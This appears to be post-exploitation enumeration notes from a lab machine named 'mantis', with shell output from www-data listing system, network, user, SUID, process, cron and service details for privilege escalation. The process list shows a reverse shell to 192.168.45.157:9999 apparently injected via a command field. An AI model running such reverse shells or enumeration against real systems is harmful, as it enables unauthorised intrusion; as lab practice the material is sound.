System/Kernel


www-data@mantis:/var/www/html/bugtracker$ uname -a ; cat /etc/*release
Linux mantis 5.4.0-110-generic #124-Ubuntu SMP Thu Apr 14 19:46:19 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.4 LTS"
NAME="Ubuntu"
VERSION="20.04.4 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.4 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
  • 5.4.0-110-generic
  • x86_64
  • Ubuntu 20.04.4 LTS (Focal Fossa)

Networks


www-data@mantis:/var/www/html/bugtracker$ ip route ; arp -a
default via 192.168.135.254 dev ens160 proto static metric 100 
192.168.135.0/24 dev ens160 proto kernel scope link src 192.168.135.204 metric 100 
_gateway (192.168.135.254) at 00:50:56:9e:59:95 [ether] on ens160
www-data@mantis:/var/www/html/bugtracker$ netstat -antup | grep LIST
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   

Users & Groups


www-data@mantis:/var/www/html/bugtracker$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mantis:x:1000:1000::/home/mantis:/bin/bash
total 12K
4.0K drwxr-xr-x  3 mantis mantis 4.0K May 17  2022 mantis
4.0K drwxr-xr-x  3 root   root   4.0K May 17  2022 .
4.0K drwxr-xr-x 20 root   root   4.0K Jan  7  2021 ..

mantis

www-data@mantis:/var/www/html/bugtracker$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root) 
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=998(lxd) gid=100(users) groups=100(users)
uid=112(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=113(mysql) gid=117(mysql) groups=117(mysql)
uid=114(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(mantis) gid=1000(mantis) groups=1000(mantis)

uid=1000(mantis) gid=1000(mantis) groups=1000(mantis)

SUIDs


www-data@mantis:/var/www/html/bugtracker$ find / -perm -04000 -ls -type f 2>/dev/null | grep -v '/snap'
    12559    388 -rwsr-xr--   1 root     dip               395144 Jul 23  2020 /usr/sbin/pppd
     4234     52 -rwsr-xr--   1 root     messagebus         51344 Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
     6752    468 -rwsr-xr-x   1 root     root              477672 Feb 11 14:09 /usr/lib/openssh/ssh-keysign
     7610     24 -rwsr-xr-x   1 root     root               22840 Feb 21  2022 /usr/lib/policykit-1/polkit-agent-helper-1
     1372     16 -rwsr-xr-x   1 root     root               14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
     7468     84 -rwsr-xr-x   1 root     root               85064 Feb  6  2024 /usr/bin/chfn
      495     40 -rwsr-xr-x   1 root     root               39144 Apr  9  2024 /usr/bin/umount
      364     56 -rwsr-xr-x   1 root     root               55528 Apr  9  2024 /usr/bin/mount
     2785    164 -rwsr-xr-x   1 root     root              166056 Apr  4  2023 /usr/bin/sudo
     7608     32 -rwsr-xr-x   1 root     root               31032 Feb 21  2022 /usr/bin/pkexec
     7658     68 -rwsr-xr-x   1 root     root               68208 Feb  6  2024 /usr/bin/passwd
     7580     44 -rwsr-xr-x   1 root     root               44784 Feb  6  2024 /usr/bin/newgrp
     1439     68 -rwsr-xr-x   1 root     root               67816 Apr  9  2024 /usr/bin/su
      667     40 -rwsr-xr-x   1 root     root               39144 Mar  7  2020 /usr/bin/fusermount
     7497     88 -rwsr-xr-x   1 root     root               88464 Feb  6  2024 /usr/bin/gpasswd
      488     56 -rwsr-sr-x   1 daemon   daemon             55560 Nov 12  2018 /usr/bin/at
     7469     52 -rwsr-xr-x   1 root     root               53040 Feb  6  2024 /usr/bin/chsh

SGIDs


www-data@mantis:/var/www/html/bugtracker$ find / -perm -02000 -ls -type f 2>/dev/null | grep -v '/snap'
   541670      4 drwxr-s---   2 root     dip          4096 May 17  2022 /etc/chatscripts
   541688      4 drwxr-s---   2 root     dip          4096 May 17  2022 /etc/ppp/peers
   307042      4 drwxr-s---   2 mysql    adm          4096 Apr 10 18:41 /var/log/mysql
    12049      4 drwxr-sr-x   3 root     systemd-journal     4096 Jan  7  2021 /var/log/journal
   524863      4 drwxr-sr-x   2 root     systemd-journal     4096 Apr 10 18:41 /var/log/journal/b266781b406945aeb7b9b987494ac6b1
    11741      4 drwxrwsr-x   2 root     mail                4096 Jul 31  2020 /var/mail
    11739      4 drwxrwsr-x   2 root     staff               4096 Apr 15  2020 /var/local
      326      0 drwxr-sr-x   2 root     systemd-journal       40 Aug  3  2024 /run/log/journal
     2317     44 -rwxr-sr-x   1 root     shadow             43160 Jan 10  2024 /usr/sbin/unix_chkpwd
     2164     44 -rwxr-sr-x   1 root     shadow             43168 Jan 10  2024 /usr/sbin/pam_extrausers_chkpwd
   134101     16 -rwxr-sr-x   1 root     utmp               14648 Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
     6746    344 -rwxr-sr-x   1 root     ssh               350504 Feb 11 14:09 /usr/bin/ssh-agent
      586     44 -rwxr-sr-x   1 root     crontab            43720 Feb 13  2020 /usr/bin/crontab
     3996     84 -rwxr-sr-x   1 root     shadow             84512 Feb  6  2024 /usr/bin/chage
      488     56 -rwsr-sr-x   1 daemon   daemon             55560 Nov 12  2018 /usr/bin/at
     7471     32 -rwxr-sr-x   1 root     shadow             31312 Feb  6  2024 /usr/bin/expiry
      501     16 -rwxr-sr-x   1 root     tty                14488 Mar 30  2020 /usr/bin/bsd-write
     8380      4 drwxrwsr-x   3 root     staff               4096 Jul 31  2020 /usr/local/lib/python3.8
     8381      4 drwxrwsr-x   2 root     staff               4096 Jul 31  2020 /usr/local/lib/python3.8/dist-packages

Capabilities


www-data@mantis:/var/www/html/bugtracker$ getcap -r / 2>/dev/null
/snap/core20/1434/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep

Processes


www-data@mantis:/var/www/html/bugtracker$ ps -auxwww
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.1  1.0 168924 10340 ?        Ss   18:39   0:10 /lib/systemd/systemd --system --deserialize 32
message+     953  0.0  0.4   8144  4720 ?        Ss   18:41   0:02 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         961  0.0  0.6  29656  6344 ?        Ss   18:41   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         963  0.0  0.4 232712  4036 ?        Ssl  18:41   0:00 /usr/lib/policykit-1/polkitd --no-debug
root         968  0.0  0.4  16544  4080 ?        Ss   18:41   0:01 /lib/systemd/systemd-logind
root         969  0.0  0.5 392500  5964 ?        Ssl  18:41   0:00 /usr/lib/udisks2/udisksd
root        1013  0.0  0.3 314452  3860 ?        Ssl  18:41   0:00 /usr/sbin/ModemManager
root        1111  0.0  0.6 107904  6352 ?        Ssl  18:41   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root        1176  0.0  0.2   6812  2360 ?        Ss   18:41   0:00 /usr/sbin/cron -f
daemon      1181  0.0  0.2   3792  2048 ?        Ss   18:41   0:00 /usr/sbin/atd -f
root        1193  0.0  0.1   5828  1648 tty1     Ss+  18:41   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root        5516  0.0  0.5 259016  5840 ?        Ssl  18:45   0:00 /usr/sbin/NetworkManager --no-daemon
root        9434  0.0  0.3 235564  3196 ?        Ssl  18:46   0:00 /usr/lib/accountsservice/accounts-daemon
root       22430  0.0  0.4  12184  4316 ?        Ss   18:47   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root       31321  0.0  0.7 194096  7628 ?        Ss   18:48   0:00 /usr/sbin/apache2 -k start
uuidd      33109  0.0  0.0   7992   620 ?        Ss   18:48   0:00 /usr/sbin/uuidd --socket-activation
www-data   54029  0.0  1.7 194852 17648 ?        S    18:49   0:00 /usr/sbin/apache2 -k start
root       62469  0.0  1.7 345768 17996 ?        SLsl 18:49   0:01 /sbin/multipathd -d -s
root       62984  0.0  0.4  22468  4892 ?        Ss   18:50   0:00 /lib/systemd/systemd-udevd
systemd+   73914  0.0  0.4  18380  4332 ?        Ss   18:50   0:00 /lib/systemd/systemd-networkd
systemd+   73928  0.0  0.8  24128  8424 ?        Ss   18:50   0:00 /lib/systemd/systemd-resolved
root       73931  0.0  1.3  43168 13948 ?        S<s  18:50   0:01 /lib/systemd/systemd-journald
systemd+   74028  0.0  0.3  90192  3132 ?        Ssl  18:50   0:00 /lib/systemd/systemd-timesyncd
root       87368  0.1  2.4 1320308 24520 ?       Ssl  18:51   0:09 /usr/lib/snapd/snapd
mysql      93199  0.0  5.1 1253080 51732 ?       Ssl  18:53   0:06 /usr/sbin/mysqld
root      106623  0.0  0.2  13688  2612 ?        Ss   18:54   0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
syslog    108302  0.0  0.2 224492  2928 ?        Ssl  18:55   0:00 /usr/sbin/rsyslogd -n -iNONE
root      142484  0.0  0.5  47548  5152 ?        Ss   18:59   0:00 /usr/bin/VGAuthService
root      142485  0.0  0.5 163116  5080 ?        Ssl  18:59   0:04 /usr/bin/vmtoolsd
www-data  155565  0.0  1.7 194852 17832 ?        S    20:11   0:00 /usr/sbin/apache2 -k start
www-data  155575  0.0  1.7 194772 17084 ?        S    20:11   0:00 /usr/sbin/apache2 -k start
www-data  155974  0.0  1.5 194804 15568 ?        S    20:24   0:00 /usr/sbin/apache2 -k start
www-data  155975  0.0  1.6 194808 16604 ?        S    20:24   0:00 /usr/sbin/apache2 -k start
www-data  155977  0.0  1.6 194788 16552 ?        S    20:24   0:00 /usr/sbin/apache2 -k start
www-data  155979  0.0  1.6 194788 16484 ?        S    20:24   0:00 /usr/sbin/apache2 -k start
www-data  155981  0.0  1.7 194844 17088 ?        S    20:24   0:00 /usr/sbin/apache2 -k start
www-data  156860  0.0  1.6 194788 16388 ?        S    20:51   0:00 /usr/sbin/apache2 -k start
www-data  156863  0.0  1.5 194648 15076 ?        S    20:51   0:00 /usr/sbin/apache2 -k start
www-data  156864  0.0  1.5 194648 15084 ?        S    20:51   0:00 /usr/sbin/apache2 -k start
www-data  156889  0.0  0.0   2608   532 ?        S    20:52   0:00 sh -c bash -c "bash -i >& /dev/tcp/192.168.45.157/9999 0>&1"; -Tpng
www-data  156890  0.0  0.2   3976  2788 ?        S    20:52   0:00 bash -c bash -i >& /dev/tcp/192.168.45.157/9999 0>&1
www-data  156891  0.0  0.3   4240  3292 ?        S    20:52   0:00 bash -i
www-data  157137  0.0  0.3   6072  3112 ?        R    20:58   0:00 ps -auxwww
  • root 1176 0.0 0.2 6812 2360 ? Ss 18:41 0:00 /usr/sbin/cron -f

Cron & Systemd


www-data@mantis:/var/www/html/bugtracker$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
 
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT                        LEFT          LAST                        PASSED       UNIT                         ACTIVATES                     
Thu 2025-04-10 21:09:00 UTC 8min left     Thu 2025-04-10 20:39:01 UTC 21min ago    phpsessionclean.timer        phpsessionclean.service       
Fri 2025-04-11 00:00:00 UTC 2h 59min left Thu 2025-04-10 18:41:49 UTC 2h 18min ago logrotate.timer              logrotate.service             
Fri 2025-04-11 00:00:00 UTC 2h 59min left Thu 2025-04-10 18:41:49 UTC 2h 18min ago man-db.timer                 man-db.service                
Fri 2025-04-11 01:41:53 UTC 4h 41min left Thu 2025-04-10 18:47:49 UTC 2h 12min ago ua-timer.timer               ua-timer.service              
Fri 2025-04-11 06:20:12 UTC 9h left       Thu 2025-04-10 18:41:49 UTC 2h 18min ago apt-daily-upgrade.timer      apt-daily-upgrade.service     
Fri 2025-04-11 08:34:47 UTC 11h left      Thu 2025-04-10 18:41:49 UTC 2h 18min ago fwupd-refresh.timer          fwupd-refresh.service         
Fri 2025-04-11 09:37:19 UTC 12h left      Thu 2025-04-10 18:41:49 UTC 2h 18min ago motd-news.timer              motd-news.service             
Fri 2025-04-11 10:32:19 UTC 13h left      Thu 2025-04-10 18:41:49 UTC 2h 18min ago apt-daily.timer              apt-daily.service             
Fri 2025-04-11 18:54:34 UTC 21h left      Thu 2025-04-10 18:54:34 UTC 2h 5min ago  systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2025-04-13 03:10:34 UTC 2 days left   Thu 2025-04-10 18:41:49 UTC 2h 18min ago e2scrub_all.timer            e2scrub_all.service           
Mon 2025-04-14 00:00:00 UTC 3 days left   Thu 2025-04-10 18:41:49 UTC 2h 18min ago fstrim.timer                 fstrim.service                
 
11 timers listed.
Pass --all to see loaded but inactive timers, too.

Services


www-data@mantis:/var/www/html/bugtracker$ systemctl list-units --state=running
  UNIT                              LOAD   ACTIVE SUB     DESCRIPTION                                                  
  proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
  init.scope                        loaded active running System and Service Manager                                   
  accounts-daemon.service           loaded active running Accounts Service                                             
  apache2.service                   loaded active running The Apache HTTP Server                                       
  atd.service                       loaded active running Deferred execution scheduler                                 
  cron.service                      loaded active running Regular background program processing daemon                 
  dbus.service                      loaded active running D-Bus System Message Bus                                     
  getty@tty1.service                loaded active running Getty on tty1                                                
  mariadb.service                   loaded active running MariaDB 10.3.39 database server                              
  ModemManager.service              loaded active running Modem Manager                                                
  multipathd.service                loaded active running Device-Mapper Multipath Device Controller                    
  networkd-dispatcher.service       loaded active running Dispatcher daemon for systemd-networkd                       
  NetworkManager.service            loaded active running Network Manager                                              
  open-vm-tools.service             loaded active running Service for virtual machines hosted on VMware                
  polkit.service                    loaded active running Authorization Manager                                        
  rsyslog.service                   loaded active running System Logging Service                                       
  snapd.service                     loaded active running Snap Daemon                                                  
  ssh.service                       loaded active running OpenBSD Secure Shell server                                  
  systemd-journald.service          loaded active running Journal Service                                              
  systemd-logind.service            loaded active running Login Service                                                
  systemd-networkd.service          loaded active running Network Service                                              
  systemd-resolved.service          loaded active running Network Name Resolution                                      
  systemd-timesyncd.service         loaded active running Network Time Synchronization                                 
  systemd-udevd.service             loaded active running udev Kernel Device Manager                                   
  udisks2.service                   loaded active running Disk Manager                                                 
  unattended-upgrades.service       loaded active running Unattended Upgrades Shutdown                                 
  uuidd.service                     loaded active running Daemon for generating UUIDs                                  
  vgauth.service                    loaded active running Authentication service for virtual machines hosted on VMware 
  wpa_supplicant.service            loaded active running WPA supplicant                                               
  dbus.socket                       loaded active running D-Bus System Message Bus Socket                              
  multipathd.socket                 loaded active running multipathd control socket                                    
  snapd.socket                      loaded active running Socket activation for snappy daemon                          
  syslog.socket                     loaded active running Syslog Socket                                                
  systemd-journald-audit.socket     loaded active running Journal Audit Socket                                         
  systemd-journald-dev-log.socket   loaded active running Journal Socket (/dev/log)                                    
  systemd-journald.socket           loaded active running Journal Socket                                               
  systemd-networkd.socket           loaded active running Network Service Netlink Socket                               
  systemd-udevd-control.socket      loaded active running udev Control Socket                                          
  systemd-udevd-kernel.socket       loaded active running udev Kernel Socket                                           
  uuidd.socket                      loaded active running UUID daemon activation socket                                
 
LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.
 
40 loaded units listed.
  • apache2.service
  • mariadb.service

Sudo Version


www-data@mantis:/var/www/html/bugtracker$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

Sudo version 1.8.31

Glibc Version


www-data@mantis:/var/www/html/bugtracker$ ldd --version
ldd (Ubuntu GLIBC 2.31-0ubuntu9.17) 2.31
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

ldd (Ubuntu GLIBC 2.31-0ubuntu9.17) 2.31